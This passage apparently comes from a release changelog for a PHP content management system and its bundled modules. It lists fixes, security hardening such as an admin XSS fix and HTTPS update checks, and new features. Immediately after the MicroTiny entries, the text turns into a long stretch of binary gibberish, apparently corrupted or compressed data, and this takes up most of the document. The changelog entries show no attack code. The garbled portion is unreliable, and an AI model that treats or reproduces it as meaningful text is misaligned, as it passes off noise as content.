  - Fixes an issue where a 404 handler error page would not be rendered correctly if for some reason the route did not specify a page id to load.
  - More fixes to cms_url class.
  - Numerous minor optimizations.
  - Add to content types the ability to set basic attributes for properties from within the page type definition.
  - Fixes problems with pagelink and link content types not being properly editable by additional editors.
  - Adds more type and content cleaning into the content types FillParams method(s).
  - Pass an explicit cacheid in to createtemplate in index.php.
  - Fix an error message in the autorefresh JavaScript class.
  - Fix problems that could result in uid=1 becoming inactive, and not a member of other groups when edited by another user.
  - Fix query problem in CmsLayoutStylesheetQuery with Mysql 5.7.
  - The {content} tag now supports passing data attributes to the generated textarea, for use by syntax highlighter and WYSIWYG modules. i.e: {content data-foo="bar"}.
  - Refactoring of the Admin login code to be cleaner, more efficient, more secure.
  - No longer allow any modules to auto-upgrade on frontend requests.
  - Fix problem with cms_filecache_driver::clear().
  - Introduces the new Hook mechanism to allow optimizing cms_stylesheet a bit further. All core SendEvent calls are now implemented as hooks.
  - changegroupperms can now localize permission names,  and add an info string for each permission. (the listpermissions hook).
  - Adds add_headtext(), get_headtext(),  add_footertext(), get_footertext() methods to the Admin theme class.
  - minor refactoring of admin/index.php, admin/header.php, admin/footer.php and admin/moduleinterface.php.
  - now use hooks so that loaded modules can now add text to the head area of any Admin page output.
  - Change the help for the basic attributes.
  - Adds new 'switch user' functionality for members of the Admin group.
  - Re-factor the content page selector ... now supports two modes (one for a simple list, and the previous dynamic one that is faster for large sites)
    the simple list mode is used for users with limited edit capabilities on pages.
  - Adds a new Smarty plugin {page_selector} to the Admin lib.
  - New arguments to the CreateHierarchyDropdown function (deprecated) and adjust documentation.
  - Content pages now have the ability to control whether or not the page wants any more children.
  - The TemplateType class now has a help callback to optionally allow retrieving help for templates of a particular type.
  - Permissions are now grouped logically by module/originator in ChangeGroupPermissions.
  - Now use HTTPS for the latest version check.
  - Adds the public_cache_url config entry,  and make sure that the css_url uses that by default.
  - Adds many core hooks.
  - Enhance the {page_image} plugin to optionally output a full HTML img tag if there is a value for the respective property.
  - Improve the {content_image} plugin to output nothing if there is no value for the property, and to output any non-internal arguments as attributes to the HTML img tag.
  - Upgrade to an un-modified version of smarty v3.1.31.
  - Move plugins directory to lib/plugins since we now have the assets/plugins directory for custom plugins.  Upgrading should preserve any custom plugins in the /plugins directory.
  - Add new plugins {thumbnail_url}, {file_url} and {cms_filepicker).
  - Add more intelligence to the tableoption handling for DataDictionary::CreateTableSQL.
  - Minor improvements to the asynchronous behaviour of the locking functionality.
  - #11295 - Cannot change the name of a UDT, always creates new UDT.
  - #11080 - Parameter $adding in GetContentBlockFieldInput always FALSE.
  - #11093 - Bad error message in jquery.cmsms_autorefresh.js.
  - #11133 - is_email() fails on domain check.
  - #11235 - munge_string_to_url leaves trailing dashes at the end of munged URL.
  - #11287 - Password reset form's password fields have different lengths.
  - Fix issue with module actions if 'content_en' block name was given on the default content block.
  - Better security when saving content pages.  Most primary fields are cast to their appropriate data type (int, bool, etc).  MenuText, and TitleAttribute can no longer contain html tags like <strong>foo</strong>.
  - Fixes issue with entities in redirecting links
  - The href/page argument to {cms_selflink} is now decoded before resolving to a page id.

Navigator v1.0.5
  - Minor optimizations.
  - Now use pageid in calculations of cacheid.
  - Now output template help to Navigator.

Installation Assistant v1.3
  - Only create dummy index.html files in subdirectories we created.
  - Clear cache after step 9.
  - Upgrade routine now asks for, and tests database credentials.
  - Upgrade routine now rewrites the config.php file (but keeps a backup).
  - Set a few more preferences to reasonable defaults on install. Specifically related to site cleanup and performance.
  - On installation, now insure that tmp/cache and tmp/templates_c directories are empty.
  - Now displays if files are going to be skipped.
  - Adds clear option for development purposes.
  - No longer ask to save database password.
  - On install now create the assets directory structure.
  - On upgrade (for 2.2) now create the assets directory structure and move tmp/configs, tmp/templates, module_custom, admin/custom, etc. within it.
  - When using the expanded installer allow changing the destination directory on step 1.
  - Check for existing files in the installation directory for new installations.
  - Added more notes to aide in diagnosing white screens
  - Modify package .zip files so that extracted files will usually have 644 permission (depends on the unzip routine used).

CmsJobManager
  - New core module to handle queued asynchronous tasks.

Content Manager
  - Minor tweak to bulk delete pages.
  - Minor fix to the active tab when changing a template or design.
  - Now listen to the 'default parent page' user preference.
  - Fix minor XSS problem in the Admin if some loser puts JavaScript into the title field or alias field or menu text field.
  - Now allow filtering pages by owner, editor, template, or design.  Only for Administrators with Modify any page, or Manage all content permissions.
  - Fix problems with auto-refresh being too fast for some operations.
  - Now auto scroll to the first matched page in a find.
  - Additional editors of a page cannot change the content type. Only owners, or users with the Manage all Content permissions.
  - Fix a problem with the call to GetTabElements.

DesignManager
  - Move the designs tab of the main interface into third position.
  - Implement sorting in edit design.
  - Remove option menus (for now) from templates, stylesheets, and designs tab.
  - Modify the template list functionality in edit-design to allow using keyboard control. Space or + to select an item on the left, and right arrow to move.
  - Modify the edit-design functionality to allow clicking on an attached template or stylesheet to edit it.
  - Generic templates now display a usage string.
  - When creating a new template, associate the new template with the default design.
  - Add reset buttons to the filter forms.
  - No longer check for default content block in a template.
  - Adds the ability to export a template to a file within the assets directory, and to import from the assets directory.
  - If a file exists in the assets/templates directory corresponding to a template name, do not allow in-browser editing.
  - Add bulk actions to allow importing and exporting multiple templates.
  - In the template list, if a file exists for a template... display it in the filename column.
  - Adds the ability to export a stylesheet to a file within the assets directory, and to import from the assets directory.
  - If a file exists in the assets/css directory corresponding to a stylesheet name, do not allow in-browser editing.
  - Add bulk actions to allow importing and exporting multiple stylesheets.
  - In the stylesheet list, if a file exists for a stylesheet display it in the filename column.

News v2.51
  - Minor fix to add category.
  - Removes GetNotificationOutput method.
  - Add a task that runs at least every 15 minutes to detect draft articles... create an alert for this.
  - Add an option to never create alerts about draft News articles.
  - Minor optimizations.
  - Adds postdate as parameters in events.
  - now output template help to Navigator.
  - Adds new 'linked file' type field that allows selecting a file using the filepicker.
  - Changes the default summary and detail templates to support the linked_file field type, and uses {thumbnail_url} and {file_url}.

FileManager v1.6.3
  - Move settings to it's own menu item under Site Admin.
  - Fix minor problem with moving a directory.
  - Minor fix to move file functionality.
  - Adds OnFileDeleted event.
  - Adds 'view raw file' icon in each viewable row.
  - Minor formatting changes in file list.
  - Now display clickable path entries for easier navigation.

Search
  - Convert to store all data using the InnoDB engine.
  - Use transactions for the addwords and deletewords stuff for performance.
  - Fix problem with query and record expiry.

AdminSearch v1.0.3
  - Fixes problem with use of 'Use Admin Search' permission.
  - Now searches for matching strings within templates and stylesheets that are stored as files.
  - Now listens to the HasSearchableContent metod when searching content pages.

ModuleManager
  - Now detect if module_custom directories exist and are populated and warn about this before upgrading a module.
  - Minor string changes.
  - Improvements to error handling in the new versions tab.
  - Write a confirmation form for uninstalling a module that displays the UninstallPreMessage or uses a default.
  - Now don't allow disabling / uninstalling myself.
  - Don't hide the upgrades tab when there are no upgrades, but show the number of upgrades in the tab title instead.
  - Now use HTTPS for requests to ModuleRepository.
  - Trigger a hook before exporting a module to XML.

MicroTiny v2.1
  - New version of the tinymce wysiwyg editor.
  - Adds a mailto plugin.
  - Now use the FilePicker module for a filepicker, required rewriting the cmsms_filepicker tinymce plugin.
  - Enable the title attribute on the image plugin.
  - Now uses PUBLIC_CACHE_LOCATION for cache files instead of hardcoding tmp/cache
����zd��5z�O�p��lI�iKvKr���@UJ$��LJ*?��V�,&��dR��Tl ���@������w��/_}�շ���/���娕���׏����?��W�~�׿��0��0��o��W���������y�������o_~���0����Н���R�('9)�s�6�3Q�_��Kٽ�\w�����屈!>W��W3��������t�7�v�����M}���?�j������z��]�vcs)�v��Nn������U�E�R]�Ӷ)L�b[J:Yi�׎|�'����h�,�.���}H)*&������=k����C}#?���yS>��5T���7xY�?��R�rusY���Q]M���S�*�C�J�QJ7����<	��[�a����͛�z,pӶ��G��t��r�^~��n�?����b}�S��1��=��&���mѽ�2L.�Ø��<���A�/~��;��4[�h���R�õn��C�Ruo!Y���qf��z�Q��LH*TS0O����
c�	����J�p�2��t݌�C�&b��Y�b�b���-K�����������J�FbKyt�
|rе�`�m���x&;�x�[�Jo~����Jf��՛us͉Ҿt�L�ҚIX��I�6��2��*�z���)mt)ѴB
oܬr��5G/5ԵU����Ngh]�r�1�Q�����PNa;Բ�z+��ۻ�:S��F�9����h&:/P���v��'��G��$�Ǫ%{T�VXC@ D��
�F�����)�Vn�;c��M)%�T����l�Jï(1��f7���E��F�fz��
mUmc@gB�+������)��Zu�\Z:�h�j����v�֌��b'3WRH�*!k_��6e���^�	�r�ڦ�$4�"`����+��bs�P�y{p�9x��3��D��Wf[�-��l\ͥi~�{�7�_����X�E��ƨ-�p&�`?2i��,��c���%�s����@]�J��GKp�暗�}���ry�`'��;�F��K�X�f�b(#wS�e^����י�7}$4�8jLj�Ǒ�Xj!\ź���*770��'��#��[�/m��N�X{Sze��nfS�=�&������a2{-�Hs��۩H;t��C�k0���@���\�E~��A�݂��i����d��H�5L	�=�����Յ\����(�r�#:%�9��(�2G���v��ºΕ��*�<8�l�ݾ/o>n���b����6�����nf}!��݂Q80݌�� ��#"T_���,�����
?|����]�E�7�h�o�	�I���~��rj�a~���@hT��b��|+����r����{kZ��`�&�s{�3ud[%����P�=�������g�ca"��؟�=b\y�bf����
���?�����,J��C6hS+�����1	�ER.�~?sAfz/�X���%D�~uW^Wk�wgs��_@?�۹����%��0��:Ƒ��!ek��u�q3���4>]��98���`�]7�л��m�%%��|���Ix����#0��/��HlD�b�+	�^��ID0�\/e
�x�ͧ��/`����c�;#�ؤn'6|��D��F�ด���U-p�M��h;��6���S����Y@�V+��9��������0 `�35�Z�ƘK�)TjW)�v�H/�~���r�a��0�1Zu�Э\����3���k�Ս�s�9�@֌�����姲�,uՠ��Y\k�����TDs�u���$���\{�@+�Qa���#�?�{ɧ>{=��ƠZ���R��,ګ|���+u`W`��]*<��@�0MD�x"�s�Q�
ZR{��foxʑ[�'����Y�����FqA�
pI�����r�>.�I�p��^��K�=<|�ڭ)x���E�]D#;AP��p�gH�3Pu�.�(����f����3�H�
�F��7�[���A_��^/.�b������n�[�_}����ᇋ�m��=��~��nϴ܋��0$�/L6��E�Y8�cyà����2�S�a�
�s���l��#�I�o�sˣ���-�P��>�jӤ��	oY�ߝo[{M��
��r�- ��f�o���7m?�U���i_&�9�X��O�G<d�2��s��S��+"
�7ܠK�Bӈ����N�����ӈ��M �#��U��٢
�]r�p���Zw���pqM��ül����6� �1�B(S�T���[��wֹ�Z곍v�6@g
��0<��T�
0g���ru�k媼�,\	"�>�E��21���lY���v{��\��{%����H��UD!nc�
"b)�bQX�N+�:�~�����wb��4y�rGk�����6�-�}3*���_��!2@��݂�G1ԩ�]��iQ��zi�%{Y�8xs�z0�O��1|b]Ɫ��В��v
TB�O�B2�$-I� �r�i��#�?�ܬz���R*BZv�5@�{vFˢ�kƸ�r��`�`Y��ā�kϢd+��ƪ$aуn�4�zi��2G
}�UХh
��$[q8�-�JI�Z�������
���u�L�N��\�6��R~���
dFn�7��r�����ׂ:�c 2j�ЁFi�-����}��{�.�n��/e�Qn����[�7q���?� �p���t#��2�X�J�L|a���I���a5�1�����a	���}+�.���|p�ӳ0Q<��@�Ic�m���
�@FwOFxٸv�)���O%0c�M���(I�8�w��aF�Ԑ���X�q$u���p�Է�=fPZ��3MI�F�Ux d�QL����������;�ҏ͇�[J�a�8{K��\?^��
ux&����ե�$׿�D����E>m����O��`���������Tvَ�sC�����W�;�3��{���n/W��(��
m~ǥ�'���Z���������j��C��?c�^�M��K})m�ٿ6���m.��}���/�-*�sl��7-GR*էj�c��#�8�}|_n[��ï�H��t��$@J��`2���"����<
�ov�M�]�K� �!��N�l7�	)��T��s�Q>����H��T�YK���i�欛�y���$�J�����͇��e*1*�����G�(MEx����Z�{e?,�T����$�V��.�"�^�c�D��6���ه�R
�簊#Y�D���1������(Q�H���[�TT���}��/��t]����\c�//���wC\S%�"��+Ap�fI�?������x"~��ӉƠ��^�t�ڱ��ʛǃ��4���2�����UWX��=8+8�&�}�
�m�3���>_����\>�+�n��Xh� 3�$S{�eL:=�����&����20w˦X�ȫӊZ�x���}0�Lj�ug���_�fW;�
H}��
?�4#�ͦ��@���6߯p��぀֭�njA��t~|�:>64�b���$F�sI	68Ef$��<�./w�V
��9�X����=\�:v_t�Ɔ�@�s<oD������-�M%���L^i�SP���ƢKmۻ��]#�24��9����`��}q�=��K�fj�´P�[:$�f�p�`7���R��?���„c�k�����U��7ؽ���k;1(�S%Qt*��k�xa2Ι9�W�7e}0l�^�s�y+����g�oJ��zΒ��������s��v��S- <�ԗ`\����oHm��k��p=�δ����ѰMD7ؠ�b�9UA���9Թ)>�۫r�>�O�P�%�fቓTWk�{��17�w�ߞv-j��c�5�^
�
���t��֗�a�*SZ/@q��Q��V�kk<�ӿ͸��F���^L�h$��F��l.���ݏ����=�����7��<��RC*�eޝ)�\$[sBxU𪪼m@���F�҈9�"hD�Tb�5�X{f^�u����2�Ҹ���k�g�!&9lu

n��/]M��*�0��_��x�&�B�x���������Gdڞu18x6'��°�������d`m�=K��1+(���s����Y�2FKQ���F&�2�P��!���n�v��� N0��@@S��
h?��n�~<[�E�[�6��m�)Y��>F�-�j2d�R��R3"�#̵���D�n����ld�,I��O���V1��9�b�o���u�j�PF�XҀ-�=������b̉����a��|���s3���|�ti��@"�xc@��K��ЁyȀ��n'S����j	=G8[�(������6ǁTye��I�����[B���{``�ț5z���xw���ȼH��=6�ݏa�i�9 j�s��te<���+����<*���5�#�v*<z
��-�x#�ֻԺ=K����Oq ���|�}I����y2 n�^+�rF��m�X�}�UT_��\:Kg.�ә{ɦkc=�*T��nn�Cu��G�.{��ApT��G���i0�Q�RH����&���Å�a1�G���_)�C�b��K��+``�2�Bƚٳ���R�Sob��6T9GS�؂Ղ�e�w&�3s��2��φ�cS>��9����L�3|#X�2�r-Ak�)|�;K#�*��V���+�sFjp���c7��L7Ub��t�!���Bx�CD0��m��_��ȇ,�2�d��c�n�>:�u�)�%���s"?�j:}9hW�A�9��5�Ms�,�iӕO-2�j�}�p���5g�<�Y���?M-�AAz�ΛhӀZFg��UsM��6}:y ���р�>]��(
��D��R�����3�݊=�@m�$�L/y��o�^؀58���+(�����&��g��̬�7U�ET��s�xD�E�w�s�������tqO\����'��=GD[����6��O��G�W�oR�ڴ*nx ��Y���NjN��m�S�;��XZ��#4��Y��}���TL����H]A\!���4Svӳ�=��u�������~��>��)�+)ic5:��V����Mhgi�O�����'`��y�T]-|��x��
����ȯ.�����T�C��Ԧ�z1�UD�(ڜJ>n� ��`R*�
G㢋�	�ڳ��⿦��5�k�{��fV���
QZ�C�p�g�+_Sg��W������B(�"g����0�D!�3���2��*����wS��𸪥�MW]�+�X�5�q™]T'�W[��z�( �T|=/NCI��%k�	Q��0�Y׀�>����O��o��);�0=���`
J�v���bHo�p���	���]�g��lY��5�"p��ى�!�&V��l� 2����`xx�Z$%����8N�p������U��V���3�Ѱ>N�%�B}���W�=�sq���	��X
� s��἗��!ϐs��,�����1�zk*�^\����F�2����,�t/�I�F�� >Au@�����C����p����5ա+$Bu��R�@�.�a�����<>N~\��u=�5dÙ�ాl��RK'�ϫ��i�������x�u
����j�a�^=�_
3��]�m���Kט?�{��@}Vޓ�]ȝ��h�<�V>�T�c�Z������\
��y>�H�|%�AE#{����
�IB�|G��Y���G��X��bwY~���a�:�N�;2?H	ybS��c}~��8�u-�q�l�`���q~P����=$l=�3;C0��⤹t�'�M�Z|T�T:w�v��oH�VC:�N���kXx鸾�S�=����.�m1����zQ�+�^e}�ʳԶŜ���ֆ��V�CUٔ��!�.ڄ�j����|�w��XcC>#��DZ���lI���\�$���۫��˾[H�Kn�zL|r�:,�y+���L�)������,�*v�5�re3jd���$��tO����f�:��Z�‹M'�<�*%jh��h�A��>��b��+�a��P߬	�>�8�^���	[�ߴ�g�0p r���O�I`��$�u�����W��2V[j:�6��i�
5F��&�m���Z����᱔Md	2_Fd�ۄ>��淗ۇq�A�3�H�y�^�M7,$�U��ό�+�X���i�bgU�j���V�{*��̵�b��b��|cߥ�W�VAp��M�4�'X�9z� �L����`��i�1�~B�/e/k3���� �AIA�Ja֚f��N�.(ӓ���//�=s'���J�; 
�����˒�7.��
�L���B��R|�v�Ԇ��E�s��H������j�r!�f����8(���
�0�.�b���,�U/���
��Bu�-���x�XNwfu��@zsG"f��
T���}�,]dc���ɡ�\2
aMt��~�5�"
42��+�:���ɲ�Hcf�ّ����V2�mM��A��,���lA��H�Ůu��>�_�G�����d5�_����t���X�eA��J~�I�-���T�,��CX��8���NIX�C���X�Xc‡a|�5��1�G����'}_|��꼓�
����T��63'��o�\�g�7��]�Aȃ5��*�]j����r�\�
�]�f��D1gY����%;�9^�OI}L��(������L��Z<<8� S�5%Q���k�
I.ID�O���h��Z?z�X�s���
�6X"o�;\����?ģ%��WÈ����j9��	8�T���}�[�L��pY�LT�x���Î�Oᓕ�Tᕽhm<��(���Tj1r-�w�5x�~���j�F�eDy�ʡt�V�H�'��X�id�5��Q�ۨ�m@l����U�e�������<���@P����C�4�t.z��W�4(�(��Y/��f�N���2��V�l�y`lӭ���1�A�T¿(��z�������A����Yy�9O狰Y��B:&UЪM��1��?���6�'���%���8[蜕���4Z�@�S(s�Z�n�+Fx8�:*�����h�qX���0_�
���~}I�z�b�����C�Vv�F���$����:�`F ]�D�1����j7M�X��nq�P�XE
�uܬ�LK�	˫7|{�i�C��9��\H��EQ�@��0��9�M�jy$@���[R�04��{q/>�̉�ּE��v}#Sc
B{�����!F�� v�8`B�C�Eb- _��W�k���qI_��]E�z�!z��f�/�ޛt?K��6;`9^Q#j�Iu�P��D�qb�'կ��`����C�VU8?˭�ޒ�!���D~�9<�[�=���V-�&.i��ZY��A�f��Ր���X^5vL�%G�b�ٝ�V�6x��& �ZV��<I�7X&g��<��ک3���ȋ�=b�=˅��FR>�IK�	��0Eñ@]	�5U�]�~$g��Q�E�Ɉ��+��5$U7�dž[�G��Ir�4�)���_|U=J,-��<IfV>*��QO�}2^m��
Ŧ1�@�.��iZEw�x��a��p�E�;��
��*��
�߁�u�E��?P��f�|�Wۈ�&e<��x�׍8��Sհ�d�
B�/�3|�TR�S"��޷5~�f
�!�B�9��8�bD�n��E�)��������}D�5|�t6�9�C>�)�6 �Ҝsp?��ƁP�a�CIW��z(��K�f�?� �5^�'�W��U�Nx���@D�)t߀-��9�GȲ��iۉ�`�.:�%�ݝӀ5��w����o[Up�'n��s5�_"4Ec]]�;b����T��*|G�,-V顊�I;�����I�ؓ���vV�a@�<&�5�Q�dĸ�h�������|��E�BrD�����M�-��)��b8S���B�$F ND5
xo_+��\���W�v������� U����0�:���?|k�	Z�XllY���a�J���u�Z��!JR�il)V�v�f�0��X����y,����,�eN6K{�2qQ��d�,��
�Ē˶bu�+�~'��#�鮪܀س�rp��-0u���,ʵ��P[}�`Zu�����V�����k'Fx�� b��b\�`�z䁣a�NI��Iî�<������E��<vy���S{V�cB�q��̈Jd��Vy������c���a�p���X�C��E0+:�~�_�@�|�S��b���}��)��&��~e��}M#�b�*�2�%�%���e�Z;^��� �Ђd"^^؆IJ 3��'��^EļJ����E���X���ؐ��V���CL��K�x�Fc�qǜ�Vl��J��Y8��*�K�n@��
[��VX��@ٻ�M�i�췯9
-��n�7u=�QB0e4�tkSR�$�I��{�t�T��X��*�r�)'ůI^����A���%�ƴy���qmE���h�1=�{�]!�����@Tĭ����5���A/Ä�!�ɞ\�xz�VNW{w%��?��@�-3�(Y k���O�Z<x��'{)4fp�jJa,GV�͹MJ^l�8�G�Ͳ��7L��kLu4�v�Q�7���D=��&�
*���,ܝ
�Rk|�0��{e�E�R����v&�{;@�9s��߬}
�3LSE��ҋ3�!�����m_7�)�fb-*�T@�-od�-U�-)��Y�vO�J����Ʊ�a�%��]b�-1Շ%���N�zrC_\��?�|�Հ��kyq�%�k�B������o��ϬA7?��t^r��e�0j���P�KC��{��c��A�
(FнG&�]^؛C�в��l�
d2�`1i��d5p�0���0��Ys�xp�I������Fh�7 Nڸ�5�ruvm������Ue�*�K��X:�y\��Nwߙ��	f�)�� ��3G��B�V������wɾ-�{���j���C�:�i�5���=�
vg��Esx��L��t�z�+��I@QR#i�A���)��wPP��bfg�·�1g��ӡ��pJ����i��)F�a��:�Y��#؝�@2}r*w���M�no����it�r�]B�%3/�āx��Kr��ά��6��<���K-��Vn�uD^��I�ձ�e�d5�:U
�R
�R�n�<S8}:c ��X�|��
<<�C���R±��dK�0T� � T���d�^�W,�L�����O��;�1>��T�X�j잉�/�ũ��u��։VA��C[�J00���d_m�	��1#��]�ɪ����%���<�i�V�S|��U��)�"�˫���{��Z0�;��1��3mD����J}�ﴋ���]f7=E�-HO���8!���n �=���YB�
�P�j�u�H�&,u�0VN�!C�ʍ�!�7����)��hok'WN���=f�E�BHM��W�Oq�?��y��	�f����)U֩$2�P]u�(m]+�b��QO��z��&����ԡ<�u�
�G�1�:ja ��NCr�p�d���i�e�=��1�"�9���b&p#3:G�
џc�4�2��=�h@߬+�X�\�h�H�}����W��e�<�Hy��4]Õ�Q|Tcm��}ס�[��"GF�t�����#b�
�V�/�>�!�������ͥ����1��,)��	�`��eB��}pg�����X�IE���HY�*8@%{ո�.����3�C��l����R��P��]��W������&�Hʠ�%�ڲdߡy�O��>aOr��o���߿y��ek�h)L���f΢f}�~��j?�S��q�M�5�JSƁ���6�ː�uz����H�Jf���0J5E��<�W}.�]��o��o���2����2��d��2�,7��覵3��2/�����Ip�
R}�%�}���/�E;�g{�#^0���[f��>���i� 2��[ք�5�0\1ix�z���G�)J�i�p;�Z΀����������xQ������g[u,S�[e_)|3}�om��C*w�x��F�`E��]9��3� �*����ke3�6���w?��֥�������!��=��m�N�!|~fX�/���Z5�Û"���0K��s���<��Rl�ɽ��j�@�S��3}������hU�#�`�Հv��
A��[�N��h���Z�9��&�Z�x����W4�X=Fx��Ʒ���!�A1u��/�,������}�"���f�5?�v�5���y�c�W���n��K��8+(y?G��Wmln-�5X���
��ݏ�kM�v��^�y�P���4 \(�Sg��ٕs�\�t`H�K4
г���"�*0�s���0���ɽ�f
{D�\�q��s���Hs��;�c�yK��qkgu�c����|�ll���!%V�ʎ���91�_3�I�I]Z
��h;0M�)����h��17���U˼uX��f��s�H�<̔*N�j�V=yx_�J]Al=ǽԹ{a#q�#`!�*��4VO�,m�0*�/QR@o��^9���9FT��8��b.�1�A���-t�l�03"���|�����dLqk�h=G��ݰ>B����=�EI�q��l�,�X���v[�p�r�c����c��W����/�]�aM��k��44s��e?�S�C���4���T[-�,m�0� �Ju�dg:_����s��g��y�g�i׭�l����(�œ@�9���k����i��|!~x��`;�����*�
�]��bUd�d�E��@�+���<���2����bwK�,[F%8+X�0�s�|`%Xϫ(�;�vo����9F4��b�΢���^v$���Y`.�,���f~cP<�
������h���`��,��C�����.����lE�@��q~pG\h+u� ,�����M9�D���ƇаM؂ȕ:rVž�[��\Ӝ-���l^�2�l��%��1���`�Cpl@4�1Xi�)f�����v~
[r�i�|`�F3,S�^G-M�/Y��{w=?�Iޛ?T�-U7��^��gp�<�r(Ǽ �ǺI)Ĭ�2�f�=�<6GH�Rz��򿖤�����e�Xپ؄CB���Ly:�?�$��,�%ŽI��W��X��J�}�Eח�,�Ko�IwуRY7XP�6�}v��\dw��w��7T�;3��3C���u��|����oI�t�,R#h��ת�B
Ê3G����r��W�;
�%���Y�=w����&�r��� %�-�"�xRa�h@�|[(�̟������N�j�Q#����Q�����A��
�L&��4���݇��D0]���m�!�[,���E������C�#�J^K�
.꡷��	~�M���?�:�l���E��E��̚`�{yP�t���c���'-}��	H���@���a������&�����?A�݇ٽ��AXe򛤎��U3Z;v>�
����c����2��m�z�wݠ�9��Sf��z(���_m�fl��puspx+YpP1���S����В��LG�+�ߵr�ٗ�Ϳ�vt(�����'U�F�^G��&������}Y��u@�l������϶;��Gkx��el�T�^n��2k�)|�ʅ}I@Y���<o���+;,�\�n�m��a���9414\	,�f;M���lt�%*?��~sŚ'W�7	y�hjcߋ>��Z)�N	��_��[� �\<�����T9K[`E�F���ݰ>ɝ�
;azH[(��"\|MiT̓
� �*^1��o���^���1*WGs�d$J`~$�4{�"�7{F�{R"��9���������QԚ���x`�~΅0Ӫ�"��~V����p���+�������RK�@�
*c�pِ�ס�����Ϸ�fN�\�X›U�V����`�e�	ﰦ�ND����\:"(����HQQ� �rW@s}�������!S�y��"�rmp��K�Ȭ��Kt��y�H.{�4�>��j�lXW�5"Ջj�N���lQ]4�y/>
�-hd�!$*yQ4��~;��Ķ
,��ϳ��>(]<xi=�,v�UY��L5�"�95;��|������B��8��C��?��^�臾��x�3�F��Z�E��d཰�E�W��ns�Xp�I�n�~����,i�f���>`g|03t���߀y	F��!���dup@
1�.���y1���7��\i���kX���H�D�_�=@u#�̻D7"��5�����3�����ǹF�a�YH�tQY�R`A�v�͗�ܒ�����C��v��ޢ��k������I�
ϓk����7^||q�&?�o�x�S��VڍZ�F��^�77�j[�/������Xm�;��Xc��\��l.Z�Rz��ޖ����W�mYg�h�kL�)Y�+|�_v��X�ueKٓ\��l-{h���)Zs�/���-�586 e�a�C�ά	
4ĿZU�nn���88�"@�w�_j|��֤C!6�E��k��1�@�b��U��ტ�����M])�����Q��;�_���8vnS/�����`�Drl�t�2!A�5���-�WD���[ug��h/4�60:$�xy�r��R�@���)8�{�6g�* �b�89#h��/�_�`��):��k��SJ�
��e�4��xx��%��gU�۪�*�d%!���/UM�,��K0�_`�z�
�Cxq fc��^6)�>
!	���PZz�@	�u3o��X���9��&�uK�a[��f��W�L�AwmzPHm�
/<Y��!0�p���;X�_���>"V%�
�������+钡�s�\�P;�y�d�����>�>/��w.Y��O\��z��f�⢃�n�1N�Ξ*΋�:���FB$���|�ßI�������ɥ�{h�(��r��A�:ot��?�h����sٰ*�F<W �����qú3�{̪}��y�k�i��dN��u��ɦ��j��`�e~+�d|M��Y�$���w�D_\�Cb��y=��,�,� @����w��)1ѾAK�2��
�1_n��C��a!���z�0���z�DŽ��X��BW�W�͂-b�me_1��ne�����x%P��g�:�5Ut�Lj��
E{��P�~f��
�M���=��(�+Ch�[�=^��pL�Y ���`NaRi�������lɨ�7��s��{7��������n�\n�����LlgAy���`�g3�7�7m��y�O>�WW=���^�1�ҹ*�,���u������ã��;��=�ǐ7|��]�u����`� �Yr8c�:��4���o��MrF�����tM0��lM/��׬�SX�7���Y�i��]��iN5@�C}�›��M��+����`,�P��1�kx�&�})��w.)�R�"�߭Y,��9�D��������`�Ѳ��h���iu���n
4$HM!1�����@��F�BS�2�6����F�pFT�Ti&W��pFG>uR�����=���X�S]g��:�1�B�GL��aӖ�	�&�
0�`DW_��7��YPP�_��?�����>�xH�ˉ�[�J��Hݲ�gtż%�].:�~��C�G��:�E��/|Ae�Y@�w���%F���Z`o 3<����n��GZ�8�<v���x��٦��ibz�Q/:Q���3���d��PA�rƷՠn��;��Չ9������$�z^�˛�l��Q;���O�_T8<�b��$�c��j��W^1�ԪT�7^�Z��=��-�l���G8�.�Vk��Q��+\X�E�xμ���PM��ĩ�R�
�0���YP�qG�fo�Y���(�jV*��4_�H�ҏ��Ҫ?�����Z�U'�,��Lm�0�3@��#/���ߚ٠�
��H��0g�(�޲���xz^vϏ�xt�lc�,���
�ͯ��X��\	_�.c�h��aͥ`��I��#���n���m��!�svʱr���d�깿��s�В�#���õ#�x�;:�r�c��h��栌�AX[�N�xކz,�|6��qR���J��C� Æ
��j�6��3�����O�i���
3`�bcgV����rV��f
{�!#ҶTK�L ��dks�a~�bjdO���^y��҇cS�^����)`9=�&�Ԣ�m:[�.^�V:�����_n0���晒���d���5��rQ���of�N�[Ȃu)6�o�58I�d�A��W|�c�����*���8�Yiv���T�;�S���,�֑`�Ln�)v��>T���[�Yb��8D��%u��������9����X��e���?�>c0��A��N?����G�����~;�ѩ2/�ǚʥ�,�l��_*�߀p�O�C��������@|#�JT�:�]�1~�A4;��q��-��P���q"��~�TaQ�o�r�&5�XW��5~p�:g��==ڞE��,56.�aK��Ę#L:W�O8�n���l�nߐĄR%-�Ͻa�v�2�dd�ca5C��L�
��*/�Mc-bLK���Lg
`�f7��~�H�s����I�a�)shZ�:
~_VX�[=+��8�e- ��<y R��Z�n�P�GY����W^&Ep.��|FѮG>��U7�z?z��$���h�w����S��d,����끫ͮ��j���S�^�K@���8u?�����51X���kj��k!��2������G�Ս����5:xI��y̅ݗ+c7���m�|�i��#�G�'R�|v
���~�������܊��7�T��`�`O�/i��X��(3xQ�C��%�A��n�����h�,¶g9?��>-��][
)ɳ����F ��R�7�oou�d�w�E;%V�S�A%�	�i�UcE�}1��ܖ{
]�4t[�#��7�v�˽��Z�5���jw�/>��xO������42�"����Ņ�������\�&�DC.l��G�����hp��e�p���YZ��u��V��jᮽ1��)���
t@ƅ$VSB���1�٪M�{p���ȅN�^��pf'%t*�n�����Y&����߯��k���e�����Y
l��S�в})���-���	����4L$�4��>����;�w�mO
��>��5��H�����h���I���&�(xY6����C��f1��Y�|�Q�di�j-��,��-�¥��iS�?��ܻ�ܞ6`Ė!݂O�
�'���y�V,.�J��7�m�cPe���c���V�m��
,��! ��W�!Ʀ�Hx�0`�����+05�A\�#8Mkc����W?A��O���E�g�ʡ�Бe�*@��Į�ˇ��k
ł
����C�Sr�
�P�ʛ�U1����>E0�]N`�(��U�H�7�b2�����`�M��
�SO�Ԍ�C�;x8�x��7�ahsXz:��46���9�3i];��n��`��MH ����ؓ�{��Yx��R렲�R6��V0˘9�R]˫V�w_��3�|�ƞ�Z`�	q#UB��*�|�w���#����7'�v.���TLK�lTc�0��`1������<?]���E�X�bfQE����I/�V�;�;�5ފ6-��eS��CL����{��^��i��G[m�}��G��6�\M���!T�͇��+xSp�R+ts�ly�;��rX��~ir��o
�k���r�b��zL8�Ҧ%�2��}��bd]c��"Θ�r��)>R��2]G�z_��Y
